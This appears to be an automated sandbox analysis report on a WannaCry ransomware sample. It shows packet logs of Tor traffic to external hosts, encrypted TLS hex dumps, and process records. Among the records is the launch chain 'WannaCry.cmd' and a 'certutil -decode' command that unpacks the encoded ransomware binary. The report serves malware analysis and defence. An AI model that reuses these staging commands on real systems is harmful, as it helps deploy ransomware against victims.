                                                    May 15, 2023 09:31:20.972635984 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972671986 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972713947 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972723007 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972788095 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972800016 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.972863913 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972918034 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972974062 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.972980022 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973021030 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973068953 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973083973 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973150969 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973164082 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973228931 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973267078 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973267078 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973319054 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973378897 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973383904 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973448992 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973491907 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973525047 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973563910 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973563910 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973613977 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973675013 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973680973 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973745108 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973761082 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973820925 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973875999 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973905087 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.973952055 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.973977089 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974024057 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974045038 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974104881 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974111080 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974174976 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974211931 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974211931 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974261999 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974319935 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974354029 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974395037 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974425077 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974473000 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974509954 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974509954 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974565029 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974615097 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974638939 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974694967 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974706888 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974771976 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974826097 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974868059 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.974899054 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.974915981 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975027084 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975035906 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975035906 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975116968 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975172043 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975210905 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975250006 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975263119 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975315094 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975346088 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975411892 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975418091 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975481987 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975517035 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975558043 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975567102 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975630045 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975677967 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975677967 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975711107 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975775957 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975824118 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975883007 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.975888968 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975931883 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.975974083 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976058960 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976066113 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976136923 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976149082 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976211071 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976269960 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976381063 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976474047 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976531982 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.976650000 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976650000 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976650000 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976650953 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976650953 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976650953 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.976792097 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:21.009711027 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:21.010174990 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:21.010932922 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:21.012708902 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.077227116 CEST49839443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:22.077303886 CEST443498395.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:22.077497959 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.077497959 CEST49839443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:22.087754965 CEST49839443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:22.087814093 CEST443498395.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:22.105763912 CEST443498395.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:22.112222910 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.112294912 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.112350941 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.112397909 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.112514019 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.112514973 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.145826101 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.145904064 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.145962000 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.146015882 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.146070957 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.146126986 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.146179914 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.146235943 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.146483898 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.179290056 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.179371119 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.179428101 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.179481030 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.179534912 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.179590940 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.179677963 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.179896116 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:22.212806940 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:22.259308100 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:23.725769043 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:31:23.725817919 CEST44349840163.172.53.201192.168.11.20
                                                    May 15, 2023 09:31:23.726110935 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:31:24.200218916 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:31:24.200229883 CEST44349840163.172.53.201192.168.11.20
                                                    May 15, 2023 09:31:24.289437056 CEST44349840163.172.53.201192.168.11.20
                                                    May 15, 2023 09:31:24.289853096 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:31:24.292278051 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:31:24.292287111 CEST44349840163.172.53.201192.168.11.20
                                                    May 15, 2023 09:31:24.292495012 CEST44349840163.172.53.201192.168.11.20
                                                    May 15, 2023 09:31:24.292907953 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:31:24.336199045 CEST44349840163.172.53.201192.168.11.20
                                                    May 15, 2023 09:32:25.963996887 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:32:26.011049986 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:36:22.717331886 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:36:22.789361000 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:36:24.717097044 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:24.717395067 CEST44349840163.172.53.201192.168.11.20
                                                    May 15, 2023 09:36:24.717667103 CEST49840443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:40.368506908 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:36:40.368752003 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:36:40.368752003 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:36:40.401513100 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:36:41.618869066 CEST49865443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:41.618896008 CEST44349865163.172.53.201192.168.11.20
                                                    May 15, 2023 09:36:41.619021893 CEST49865443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:41.619482040 CEST49865443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:41.619493961 CEST44349865163.172.53.201192.168.11.20
                                                    May 15, 2023 09:36:41.726352930 CEST44349865163.172.53.201192.168.11.20
                                                    May 15, 2023 09:36:41.726643085 CEST49865443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:41.728327036 CEST49865443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:41.728341103 CEST44349865163.172.53.201192.168.11.20
                                                    May 15, 2023 09:36:41.728657007 CEST44349865163.172.53.201192.168.11.20
                                                    May 15, 2023 09:36:41.728996038 CEST49865443192.168.11.20163.172.53.201
                                                    May 15, 2023 09:36:41.772120953 CEST44349865163.172.53.201192.168.11.20

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.11.2049837171.25.193.980C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 15, 2023 09:31:20.539139986 CEST318OUTData Raw: 16 03 01 00 ce 01 00 00 ca 03 03 84 6d bc 5d 1d 78 44 c3 5b 53 da ee 48 54 1c bb 03 1e 75 73 f1 4c a2 b3 e4 da b5 83 79 ec e4 eb 00 00 30 c0 2b c0 2f c0 0a c0 09 c0 13 c0 14 c0 12 c0 07 c0 11 00 33 00 32 00 45 00 39 00 38 00 88 00 16 00 2f 00 41
                                                    Data Ascii: m]xD[SHTusLy0+/32E98/A5qwww.4ge3xtyforv.com#
                                                    May 15, 2023 09:31:20.573807955 CEST319INData Raw: 16 03 03 00 39 02 00 00 35 03 03 64 fb 86 c6 67 46 2d 03 ce 45 ca 73 2b e6 0d 36 5a 76 61 3a 79 38 83 a5 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0d ff 01 00 01 00 00 0b 00 04 03 00 01 02 16 03 03 02 4c 0b 00 02 48 00 02 45 00 02 42 30 82 02 3e 30
                                                    Data Ascii: 95dgF-Es+6Zva:y8DOWNGRD/LHEB0>0/4O(aJ0*H0$1"0 Uwww.vsrxkfsa3qjhow3ll.com0230215000000Z230711000000Z010Uwww.t3tntq74.net0"0*H0
                                                    May 15, 2023 09:31:20.575624943 CEST319OUTData Raw: 16 03 03 00 46 10 00 00 42 41 04 67 d4 23 ec bd 1a f7 d3 b1 8f f8 19 a8 44 2c 52 3e ef 35 67 10 7d c2 91 55 0d 99 2f 1b 12 a2 f6 12 b8 07 d6 bf b4 0d f4 e0 d8 c9 9f d8 b8 de 95 21 53 a0 ed 6b 20 f6 3a bd 32 8d c7 d4 fe 60 ef 14 03 03 00 01 01 16
                                                    Data Ascii: FBAg#D,R>5g}U/!Sk :2`(._:hyrygX{8$rk}+\/S2
                                                    May 15, 2023 09:31:20.609824896 CEST319INData Raw: 14 03 03 00 01 01 16 03 03 00 28 4b 84 0b 5c bb 8a c4 0f d2 da f4 8e ea 40 87 08 cc a4 7b 18 0f b0 dd 6f 5d 91 8c 61 77 46 77 32 3e bd 28 b8 37 12 5a cc
                                                    Data Ascii: (K\@{o]awFw2>(7Z
                                                    May 15, 2023 09:31:20.610250950 CEST319OUTData Raw: 17 03 03 00 21 e3 2e 5f ca b0 08 c4 3b 3f 7e ad 5a fb dc 07 9b 3e 59 e2 fc 13 db c3 7e 61 ce 17 ad cf 49 80 82 3f
                                                    Data Ascii: !._;?~Z>Y~aI?
                                                    May 15, 2023 09:31:20.643271923 CEST321INData Raw: 17 03 03 08 0c 4b 84 0b 5c bb 8a c4 10 ce 32 0f 1d 2f 93 a1 f7 95 12 08 a9 a8 c4 ff 01 cf 71 ba 1a 29 93 87 27 0a f1 4d 1d 54 9e 83 da 1c 7e 8b 0e 60 9a e9 5a 19 9c da 75 d6 34 21 7d f9 7a 40 eb da 13 af 63 cf 73 c7 80 a7 25 59 cb 02 c5 83 03 b3
                                                    Data Ascii: K\2/q)'MT~`Zu4!}z@cs%Y*Ga&W1qyo]JoJ18==u,)p:LG,#a6A{RBmEBL-:)dDI GRij2N>n ?
                                                    May 15, 2023 09:31:20.643316984 CEST321INData Raw: 94 e5 02 37 9d 22 97 1a 0f ad 84 f6 90 26 f4 1e a3 23 95 f1 be 3b 3d b5 39 3c 37 24 a8 9a 65 a1 23 de 38 ae 42 68 3f 62 25 bb c9 7a 9c a0 65 48 d5 1e 01 9b 2f 6e d0 71 40 c7 af 29 1b f2 2d 35 63 2d 90 47 a3 6e d3 84 85 c0 51 31 98 39 78 da 02 28
                                                    Data Ascii: 7"&#;=9<7$e#8Bh?b%zeH/nq@)-5c-GnQ19x(h)jk0+w3,aypykx<vR<Ae>|VVxzWer,<G)1*lxfsy;HNtbn<W+b)|$2 MYeR3=.#xVS|
                                                    May 15, 2023 09:31:20.644093037 CEST322OUTData Raw: 17 03 03 04 1c e3 2e 5f ca b0 08 c4 3c 6b c8 cc 7f d8 16 b5 ea e1 38 74 10 29 fa 4d 23 af 65 5e 27 db 00 f9 f4 6b 7d b8 c0 d9 d1 44 5e d0 0b 2f 2b e8 df e0 a3 bb 7b 45 70 1e ee 25 7c a1 81 d6 53 a5 c9 4e 88 8d d7 84 99 f6 be c2 be 87 16 31 8e 82
                                                    Data Ascii: ._<k8t)M#e^'k}D^/+{Ep%|SN1(=h[{[Q,s"L^-x0/G;yFB!.8.klx+hCa?A#3jj6w=O$phw)cO\lE<ym.]s8+DT>=dy9?H<<&IB
                                                    May 15, 2023 09:31:20.678061962 CEST323INData Raw: 17 03 03 02 1a 4b 84 0b 5c bb 8a c4 11 e0 08 4a a3 01 40 7b 88 4a c8 e8 56 29 95 5a c2 d3 85 25 33 ce d3 87 63 ff 37 11 db d1 f2 4c db 24 33 eb 25 6f 68 95 a1 66 0b fa 7d 4b 4a 7d 4a 84 df 00 f0 8e 20 10 90 fc a1 5d f5 36 de 90 37 29 c2 3c 15 cd
                                                    Data Ascii: K\J@{JV)Z%3c7L$3%ohf}KJ}J ]67)<i]_#`n+U:CO?|K,aA")z;28Fo?:+5OMH<&)t-bL7:[+kK'X1yznR_a%whM
                                                    May 15, 2023 09:31:20.687789917 CEST324OUTData Raw: 17 03 03 04 1c e3 2e 5f ca b0 08 c4 3d 9e 55 ed eb b3 bb a1 bf 76 0d cc 60 4a 8b e9 b6 85 d3 90 8d 9e 3c 6e 0e 87 b3 8a 9f e4 5d d3 a8 9d ae 87 f1 33 86 e7 90 5b a4 4c 44 2f d2 c2 68 5d ae 39 fc e0 cf 1a f7 c8 ed 9e 6b 15 97 12 28 51 74 20 6d 61
                                                    Data Ascii: ._=Uv`J<n]3[LD/h]9k(Qt ma1TN@k9lf)VK)wIVuW.l,)S=Ie+N0}e]T(.8mf2z;(b&38I.<[.z~XZBO+zeNNNOcm#
                                                    May 15, 2023 09:31:20.721831083 CEST326INData Raw: 17 03 03 0f e8 4b 84 0b 5c bb 8a c4 12 72 14 16 f4 11 33 12 ec 39 e6 60 23 16 0f 1f 72 eb a4 97 5d fa 1c 1e 60 da 6c d9 0b 3c ca 71 b1 2d 42 74 51 04 1f 2d 7f 2e 27 a4 e0 1f a1 46 c6 ec 06 b4 17 43 bc a0 fd 50 6c 7a fb b0 5d c0 ea 16 20 70 47 26
                                                    Data Ascii: K\r39`#r]`l<q-BtQ-.'FCPlz] pG&&BP3=#D"U4{Az|=dTNZph6;}X9ai*1s0j=w(WtgpE6=mxA3[`!*Fi#%OEqy;!
                                                    May 15, 2023 09:31:20.721853971 CEST327INData Raw: 7d fe 98 ed 93 0a 85 45 42 f9 a0 d7 30 90 69 94 bb fe d5 9d 82 1f 43 71 42 6e ec bb 3e 91 39 6f 9e fd 99 df d6 78 a9 99 99 4c dd 9d cf 7a b4 fa c5 00 36 ba 1d bb 3c 9c 8b 54 a2 b7 c4 76 95 0d b4 52 f0 2b c3 8d 3a 4f 8d ac ee 4c 6b 00 7b 3d f0 3c
                                                    Data Ascii: }EB0iCqBn>9oxLz6<TvR+:OLk{=<.[3 Hp+eO(gSiXm\ZSD\0zix]k1=N=/0cKDaF-UqxS78=*u6(i@7g^d'e0/x
                                                    May 15, 2023 09:31:20.721868992 CEST329INData Raw: dd 5e 15 a6 45 c8 b6 34 fa 34 86 0d a9 11 09 05 cb e0 68 00 da a0 c9 59 20 40 ae 2e a1 20 c3 7a f1 66 53 c0 30 8f c2 1d d3 a0 f7 92 f8 13 fa 7e bb 8d 84 14 f6 39 ad 04 5d 2e c0 95 ff c0 f1 5f 13 d6 90 61 29 d0 19 63 60 f8 43 98 a1 b5 6d 10 8b e5
                                                    Data Ascii: ^E44hY @. zfS0~9]._a)c`Cm4%4akFm|?50*(rc0N^VVngrK7g@O4$xXu.Of\IE!zsB\kjG$d~xx-JDm[#~
                                                    May 15, 2023 09:31:20.721882105 CEST329INData Raw: 40 fd 84 98 b5 21 b3 6d da 4f a1 5f 8d 7c 5f 42 01 ca eb f2 ec 39 25 e3 57 6a 97 4d fb 7c d1 be 7d a4 e9 19 c6 f3 ea e3 ac 60 a1 89 72 1b 1f ac 44 24 ed ac c8 c0 ab b5 76 ac 00 39 91 94 7f ca 82 b7 cb 94 31 04 ef 8c ab fa 96 6c 00 64 6e 22 83 e4
                                                    Data Ascii: @!mO_|_B9%WjM|}`rD$v91ldn"D?t?WIZxX=-2*&<6u\}/sZVNh""(.[wYTs@yuT`<m2zX06;
                                                    May 15, 2023 09:31:20.721898079 CEST330INData Raw: 17 03 03 0f e8 4b 84 0b 5c bb 8a c4 13 73 26 f0 7c ea 41 51 16 2e 2b 13 0a b3 c1 74 88 87 3a 28 45 ab d3 33 4b 1e e7 67 30 69 12 60 b2 2d 69 85 12 c9 84 4b 6e 00 0a eb d7 ee 78 a6 12 42 83 90 bb 20 eb f4 35 9a b2 48 c9 00 15 a5 27 bb c0 75 35 20
                                                    Data Ascii: K\s&|AQ.+t:(E3Kg0i`-iKnxB 5H'u5 P'H[2Ydt+P+FqbI&KQb1Ln:W{{:/(Hj^^82QISfe=;Ku8c14gt<X4ju)fmRNE
                                                    May 15, 2023 09:31:20.756222963 CEST361OUTData Raw: 17 03 03 02 1a e3 2e 5f ca b0 08 c4 3e 1b 09 b7 c7 59 e9 86 de b0 cb fc b8 93 66 b1 d2 84 ca 8f 3f 6f c4 45 a4 77 9d e7 dc e6 a4 fa d6 3b 5f 08 ad 1e 8a 69 3d 15 a8 ee d0 99 01 73 c4 25 53 62 df f7 57 b9 f7 c3 31 2e 68 bd 9c 38 86 ef 3f 97 d1 7e
                                                    Data Ascii: ._>Yf?oEw;_i=s%SbW1.h8?~mATNA]G/B&; nGmWAxA}R+*w:iEF/^r0RTx1wMMubS>N?(g8 h$\$(qfpr5
                                                    May 15, 2023 09:31:20.790647984 CEST390OUTData Raw: 17 03 03 04 1c e3 2e 5f ca b0 08 c4 3f 1c 62 ff 05 42 b6 ff 78 7c 3b 21 a1 a9 10 ba 69 18 6c 17 a3 2f 34 02 cd 46 db b0 98 b6 5e 61 98 f9 ce 13 69 a2 aa 73 c1 0b a6 a1 d0 f8 a4 2c 21 5c 6e 13 d0 7d d4 aa 33 d9 9b aa 98 62 71 65 46 20 51 be aa bf
                                                    Data Ascii: ._?bBx|;!il/4F^ais,!\n}3bqeF Qfr-vio}^wTy!}y%-rDAzA;qQSp5OF28u.bN2T]'Yxep?hkn]5>,dyB1W&Y3^9fS>.v9?
                                                    May 15, 2023 09:31:20.825130939 CEST417OUTData Raw: 17 03 03 02 1a e3 2e 5f ca b0 08 c4 40 93 a2 6c 96 2b 84 b0 bf c5 5b 2c 03 f0 1a ee fc 52 b3 26 93 6f 27 b7 a2 7c f3 7f b1 36 3c 66 2a 95 24 b0 08 56 82 85 72 41 b2 92 81 39 5e a5 9c 0d d3 6b 6d a5 87 c6 96 48 96 de 0c 7d 7f d5 e9 00 77 a2 3c f9
                                                    Data Ascii: ._@l+[,R&o'|6<f*$VrA9^kmH}w<9KsSNa|84s,!;%]^^c|tj%qO[v:@Lkoz<wM25RcV(/cB\Pq{m`l
                                                    May 15, 2023 09:31:20.892543077 CEST624OUTData Raw: 17 03 03 04 1c e3 2e 5f ca b0 08 c4 41 09 82 92 63 3f 90 06 6c 57 38 93 95 5c 69 5f 4b 1b d6 e8 b6 eb 10 c9 7d 32 12 15 92 17 d4 a5 94 8d 83 24 b8 b9 d8 da d6 e8 76 21 fd 44 b3 b3 9e 4e 6b e2 5b ce ef 53 b7 0a d7 a8 97 7d d5 c3 a5 55 27 86 43 cb
                                                    Data Ascii: ._Ac?lW8\i_K}2$v!DNk[S}U'C0dW=U;oP8oFDW)Sih;R];`:@<h(i?v9?}FsqLw\9jw)d@mzg"bs"Hm,^$lK
                                                    May 15, 2023 09:31:20.893745899 CEST626OUTData Raw: 17 03 03 02 1a e3 2e 5f ca b0 08 c4 42 bc 70 07 e5 f4 40 c6 60 0a bc 81 93 97 cd 6e 91 f3 14 31 d7 de 11 2b d7 fb a8 f9 1f 60 64 bf c5 b6 6f d5 6e 78 69 f1 ad e4 94 91 0c 98 ae 8a ee db da 4e c5 2a 1f 69 49 76 9a b2 b3 44 b2 55 7f 21 75 f4 4f e8
                                                    Data Ascii: ._Bp@`n1+`donxiN*iIvDU!uO\2>UgIj,L(Q0g_U#C^l/^w #|9baSR5}q6s}6*b\JIo&(sIG<?`?zM|=


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:27:53
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WannaCry.cmd" "
                                                    Imagebase:0x7ff66e380000
                                                    File size:289792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Target ID:1
                                                    Start time:09:27:53
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:2
                                                    Start time:09:27:53
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\msg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:msg * Has Sido Hackeado!
                                                    Imagebase:0x7ff677d60000
                                                    File size:27136 bytes
                                                    MD5 hash:B42553599E40029366A0FD8F81079BED
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    General

                                                    Target ID:4
                                                    Start time:09:28:57
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\certutil.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:certutil -decode "WANNACRY.bin" "WannaCrypt0r.sk"
                                                    Imagebase:0x7ff7fd680000
                                                    File size:1651200 bytes
                                                    MD5 hash:BD8D9943A9B1DEF98EB83E0FA48796C2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
